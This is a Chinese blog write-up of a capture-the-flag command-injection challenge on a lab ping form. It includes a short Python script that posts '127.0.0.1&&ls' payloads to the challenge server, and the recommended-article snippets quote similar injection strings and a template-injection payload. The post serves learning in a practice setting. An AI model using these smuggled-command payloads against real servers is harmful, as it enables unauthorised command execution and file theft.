CTF 刷题记录(二) command_execution(攻防世界)

最新推荐文章于 2024-04-21 16:07:36 发布
最新推荐文章于 2024-04-21 16:07:36 发布
阅读量998 收藏 2
点赞数
分类专栏: 信息安全 CTF 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29566629/article/details/107633755
版权

题目

在这里插入图片描述

解题分析

进入网站,先ping 127.0.0.1 如图:
在这里插入图片描述
证明输入的指令可以在服务器里运行,然后再试试ls这种基础命令,使用“&&”命令,如图:
在这里插入图片描述
也可以执行。
写一个查询flag文件的脚本

import requests

url = "http://220.249.52.133:30703/"

list = ['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'run.sh', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var'] 

for i in list: 

    payload = {"target": "127.0.0.1&&ls ../../../%s" % i}  #查看源代码,发现输入框的id为“target”,在此模拟输入框的功能

    res = requests.post(url, data=payload).text

    if "flag" in res: 

        print("current: ", i)

        break

运行后输出:
在这里插入图片描述
linux系统中的home一般都在根目录下,先查看home目录下都有什么,如下:
在这里插入图片描述
只有一个文件flag.txt
使用cat命令查看其内容:
在这里插入图片描述
bingo !!!

qq_29566629
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF攻防世界 command_execution 解题详析
等风来
05-21 5814
ping 命令是一个常用的网络命令,用于测试两台计算机之间网络连接的连通性。通过向目标计算机发送 ICMP 协议的数据包,并等待目标计算机返回响应数据包来测试网络的可达性,同时也可以测试网络的延迟和丢包率等信息。本地回环地址是网络通信中的特殊地址,指向本机的网络接口,因此通过发送 icmp 数据包到该地址来测试网络连通性和延迟。如果 ping 命令不正确地处理其输入参数,就可能存在被攻击者利用来运行危险的命令的风险。2.ping+IP地址或主机域名+命令参数。3.ping+命令参数+IP地址或主机域名。
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。技术栈python3.6 + Django 2.1.7 + 10.3.9-MariaDB or Mysql-8.0 + REST Framework 3.9.2 + xadmin + Celery + Vue部署基于ubuntu 18 ...
CTF-WEB篇 攻防世界题目实战解析command_execution
最新发布
2301_76565920的博客
04-21 1068
command_execution (命令执行) 难度:2。Linux命令的使用,利用ping命令执行漏洞。(类比与sql注入)
CTF-命令执行
YkingH的博客
07-10 790
CTF-命令执行 什么是RCE RCE英文全称:remote command/code execute,RCE又称远程命令/代码执行 远程代码执行是指程序代码在处理输入输出的时候没有收到严格的控制,导致用户可以构造参数;包含有恶意代码的命令或者其他代码在服务器上执行。进而获取服务器权限、信息等,是发生在应用程序的逻辑层上的安全漏洞。 远程命令执行分为远程命令执行ping和远程代码执行evel等 命令注入和命令执行的区别: 命令注入:是靠各种手法在本来执行的地方进行绕过 命令绕过:是靠执行不可靠的函数导命令执
ctf-攻防世界-web:command_execution
一只菜鸟的博客
11-08 833
题目为命令执行,再看描述,写了ping功能却没有waf,四舍五入就相当于直接给了cmd啊 来到环境,先测试是linux还是windows。访问index.php,页面正常,更改大小写访问inDex.php,页面报错,显示乌班图搭建,大小写敏感,看来是linux稳了 随便输入一个ip地址,然后用 | 连接find命令查找所有带有flag名字的文件,第一个就是flag.txt 此处的*表示所有 *flag*意为所有带有flag的任意格式文件 使用cat命令查看flag.txt,出现f...
2016-02-03-ctf-command_execution命令拼接
Be Smart
03-17 385
layout: post title: “ctf-command_execution命令拼接” categories: [ctf] tags: [命令拼接] command_execution [原理] | 的作用为将前一个命令的结果传递给后一个命令作为输入 &&的作用是前一条命令执行成功时,才执行后一条命令 [目地] 掌握命令拼接的方法 [环境] windows [工具] firefox [步骤] 1.打开浏览器,在文本框内输入127.0.0.1 | find / -name "fl.
xctf-command_execution(命令执行)
烟敛寒林的博客
02-25 4662
题目地址: http://111.198.29.45:30887 主要利用hackbar进行POST注入 ls命令查看目录文件,具体用法可见: https://blog.csdn.net/dyw_666666/article/details/79184126 ls发现home目录下有flag.txt文件,然后用cat命令查看txt文件 ...
BUUCTF之Exec,攻防世界command_execution
金 帛的博客
03-16 2076
BUUCTFWP
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
我的ctf刷题wp笔记
03-25
我的ctf刷题wp笔记
攻防世界miss-01,杂项misc太湖杯
11-01
攻防世界miss_01,杂项misc太湖杯。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127630023
XCTF Web 新手区011:command_execution
立志成为最会敲代码的dancer,最会locking的程序猿
04-01 181
题目: WP: 打开题目场景 尝试ping一下本地地址127.0.0.1 试使用命令连接符,因为我们知道flag在flag.txt中,所以我们查找该文件 127.0.0.1 & find / -name flag.txt 可以看到/home/flag.txt的字样 于是,我们打印这个文件127.0.0.1&&cat /home/flag.txt ,拿到flag: (...
XCTF_Web_新手练习区:command_execution
1stPeak's Blog
06-13 5791
第十一题:command_execution 目标: 掌握有关命令执行的知识 windows或linux下: command1 & command2 :先执行command2后执行command1 command1 && command2 :先执行command1后执行command2 command1 | command2 :只执行command2 comman...
XCTF WEB command_execution
无限迭代中......
06-30 333
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5071 题解: windows或linux下: command1 && command2 先执行command1,如果为真,再执行command2 command1 | command2 只执行command...
CTF Practice
Reaper_MXBG的博客
12-15 324
Network penetration test experiment _2:CTF Practice 目录Network penetration test experiment _2:CTF Practice实验目的系统环境实验工具实验步骤和内容1. 发现目标,找到WebDeveloper的IP地址2. 利用NMAP扫描目标主机,发现目标主机端口开放、服务情况3. 若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站4. 利用whatweb探测目标网站使用的CMS模板并分析使用的CMS是什么5. 简
攻防世界command_execution
一期一会的博客
01-15 225
看题目,又是一个命令执行。这里不进行过多总结,详情请看 命令执行总结 靶场演练 我们尝试使用&&(&&表示当左边的命令执行为真时,才会去执行右边的命令)去执行命令,ls发现我们输入的是有效的。 紧接着find一下以.txt结尾的文件 127.0.0.1&&find / -name "*.txt" 找到了,直接cat查看 ...
Buuctf [第三章 web进阶]SSTI 20
CyhDl666的博客
03-19 1394
进入页面用arjun扫描一下有什么url参数 这道题是最基础的了 直接给payload前面的payload吧 {{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')}} 页面返回:password is wrong: app bin boot dev etc home lib lib64 media m.
攻防世界command_execution
03-16
攻防世界CTF)是一种针对信息安全专业人员的比赛形式,通常包括对抗性漏洞挖掘、网络攻击和防御、密码学等多种技能的考验。其中之一是command_execution,指的是攻击者利用漏洞在目标系统上执行命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值